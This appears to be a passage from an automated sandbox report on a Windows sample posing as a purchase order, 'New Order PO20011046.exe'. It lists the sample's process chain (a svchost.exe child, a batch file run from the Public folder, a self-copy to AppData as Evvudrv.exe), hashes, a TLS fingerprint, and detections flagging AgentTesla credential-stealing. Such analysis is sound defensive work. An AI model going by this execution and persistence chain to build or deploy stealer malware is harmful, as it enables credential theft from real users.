                                                                                                          Nov 28, 2020 10:28:50.550607920 CET162.159.130.233443192.168.2.449762CN=ssl711320.cloudflaressl.com CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                          CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Sep 25 02:00:00 CEST 2014Tue Sep 25 01:59:59 CEST 2029
                                                                                                          CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                                                                                          Code Manipulations

                                                                                                          Statistics

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          Analysis Process: New Order PO20011046.exe PID: 7048 Parent PID: 5852

                                                                                                          General

                                                                                                          Start time:10:27:36
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\Desktop\New Order PO20011046.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1311424 bytes
                                                                                                          MD5 hash:310A7CA550B9997D0E0BCAF645530303
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low

                                                                                                          Analysis Process: svchost.exe PID: 6700 Parent PID: 7048

                                                                                                          General

                                                                                                          Start time:10:28:09
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\System32\svchost.exe
                                                                                                          Imagebase:0x1300000
                                                                                                          File size:44520 bytes
                                                                                                          MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:moderate

                                                                                                          Analysis Process: New Order PO20011046.exe PID: 1256 Parent PID: 7048

                                                                                                          General

                                                                                                          Start time:10:28:26
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1311424 bytes
                                                                                                          MD5 hash:310A7CA550B9997D0E0BCAF645530303
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000003.759372640.0000000000574000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.921398684.0000000004B40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.919758080.0000000002251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.921099669.0000000004A80000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:low

                                                                                                          Analysis Process: cmd.exe PID: 6960 Parent PID: 6700

                                                                                                          General

                                                                                                          Start time:10:28:27
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                                                                                                          Imagebase:0x11d0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Analysis Process: conhost.exe PID: 6952 Parent PID: 6960

                                                                                                          General

                                                                                                          Start time:10:28:27
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff724c50000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Analysis Process: cmd.exe PID: 4476 Parent PID: 6700

                                                                                                          General

                                                                                                          Start time:10:28:27
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                                                                                                          Imagebase:0x11d0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Analysis Process: conhost.exe PID: 5952 Parent PID: 4476

                                                                                                          General

                                                                                                          Start time:10:28:28
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff724c50000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Analysis Process: Evvudrv.exe PID: 5488 Parent PID: 3424

                                                                                                          General

                                                                                                          Start time:10:28:35
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1311424 bytes
                                                                                                          MD5 hash:310A7CA550B9997D0E0BCAF645530303
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 69%, ReversingLabs

                                                                                                          Analysis Process: Evvudrv.exe PID: 4868 Parent PID: 3424

                                                                                                          General

                                                                                                          Start time:10:28:43
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1311424 bytes
                                                                                                          MD5 hash:310A7CA550B9997D0E0BCAF645530303
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi

                                                                                                          Disassembly

                                                                                                          Code Analysis

                                                                                                          Reset < >